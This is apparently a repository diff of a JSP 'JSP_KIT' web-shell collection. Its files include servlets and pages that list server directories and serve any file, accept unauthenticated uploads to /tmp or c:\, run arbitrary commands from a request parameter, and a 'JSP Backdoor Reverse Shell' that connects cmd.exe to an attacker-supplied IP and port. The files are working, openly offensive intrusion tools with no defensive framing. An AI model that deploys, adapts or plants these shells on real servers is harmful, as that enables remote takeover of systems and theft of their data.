/*
* ListServlet.java
*
* @author Sierra
* @version 0.1
*/
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
public class ListServlet extends HttpServlet
{
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
PrintWriter printwriter = res.getWriter();
String path = req.getParameter("file");
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
if(req.getParameter("file")==null) path = "c:\\";
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
File file = new File(path);
if(file.isDirectory())
{
String s = new String("Unknown");
String s2 = new String("Black");
File afile[] = file.listFiles();
for(int i = 0; i < afile.length; i++)
{
String s1 = new String(afile[i].toString());
printwriter.write("(");
String s3;
if(afile[i].isDirectory())
{
printwriter.write("d");
s1 = s1 + "/";
s3 = new String("Blue");
} else
if(afile[i].isFile())
{
printwriter.write("-");
s3 = new String("Green");
} else
{
printwriter.write("?");
s3 = new String("Red");
}
if(afile[i].canRead())
printwriter.write("r");
else
printwriter.write("-");
if(afile[i].canWrite())
printwriter.write("w");
else
printwriter.write("-");
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
}
printwriter.write("<hr></FONT></BODY></HTML>");
} else
if(file.canRead())
{
FileInputStream fileinputstream = new FileInputStream(file);
int j = 0;
while(j >= 0)
{
j = fileinputstream.read();
printwriter.write(j);
}
fileinputstream.close();
} else
{
printwriter.write("Can't Read file<BR>");
}
}
public String getServletInfo() {
return "Directory Listing";
}
}

BIN
jsp/hackk8/jsp_77/UpServlet.class Normal file
View file

Binary file not shown.

71
jsp/hackk8/jsp_77/UpServlet.java Normal file
View file

@ -0,0 +1,71 @@
/*
* UpServlet.java 29/04/2005
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class UpServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
out.print("<input type=\"submit\" value=\"Upload\">");
out.print("</form>");
out.print("</body></html>");
}
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
String tag = new String();
int c = '\0';
int contador = 0;
ServletInputStream in = req.getInputStream();
DataInputStream post = new DataInputStream(in);
PrintWriter out = res.getWriter();
res.setContentType("text/html");
out.print("<pre>");
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
tag=tag.concat("" + (char)c);
contador++;
}
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
// (!) Uploaded File Name
File newfile = new File("c:\\install.log");
/////////////////////////
FileOutputStream fileout = new FileOutputStream(newfile);
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
c=post.read();
fileout.write((char)c);
}
fileout.close();
out.print("<== OK");
}
public String getServletInfo() {
return "UpServlet 0.1";
}
}

1802
jsp/hackk8/jsp_77/browser.jsp Normal file
View file

File diff suppressed because it is too large Load diff

35
jsp/hackk8/jsp_77/cmd.jsp Normal file
View file

@ -0,0 +1,35 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>

32
jsp/hackk8/jsp_77/cmdjsp.jsp Normal file
View file

@ -0,0 +1,32 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->

91
jsp/hackk8/jsp_77/jsp-reverse.jsp Normal file
View file

@ -0,0 +1,91 @@
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
<!-- http://michaeldaw.org 2006 -->

77
jsp/hackk8/jsp_77/list.jsp Normal file
View file

@ -0,0 +1,77 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// list.jsp = Directory & File View
//
// by: Sierra
// modified: 27/06/2003
//
%>
<%
if(request.getParameter("file")==null) {
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<%
}
%>
<% //read the file name.
try {
File f = new File(request.getParameter("file"));
if(f.isDirectory()) {
int i;
String fname = new String("Unknown");
String fcolor = new String("Black");
%>
<HTML><BODY>
<FONT Face="Courier New, Helvetica" Color="Black">
<%
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
File flist[] = f.listFiles();
for(i=0; i<flist.length; i++) {
fname = new String( flist[i].toString());
out.print("(");
if(flist[i].isDirectory() == true) {
out.print("d");
fname = fname + "/";
fcolor = new String("Blue");
} else if( flist[i].isFile() == true ) {
out.print("-");
fcolor = new String("Green");
} else {
out.print("?");
fcolor = new String("Red");
}
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
}
%>
</FONT></BODY></HTML>
<%
} else {
if(f.canRead() == true) {
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int left = 0;
try {
while((left) >= 0 ) {
left = in.read();
outs.write(left);
}
} catch(IOException ex) {ex.printStackTrace();}
outs.flush();
outs.close();
in.close();
} else {
out.print("Can't Read file<BR>");
}
}
} catch(Exception ex) {ex.printStackTrace();}
%>

162
jsp/hackk8/jsp_77/up.jsp Normal file
View file

@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "/tmp/";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>

31
jsp/hackk8/jsp_77/win32/cmd_win32.jsp Normal file
View file

@ -0,0 +1,31 @@
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
%>
</pre>
</BODY></HTML>

162
jsp/hackk8/jsp_77/win32/up_win32.jsp Normal file
View file

@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "c:\\";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>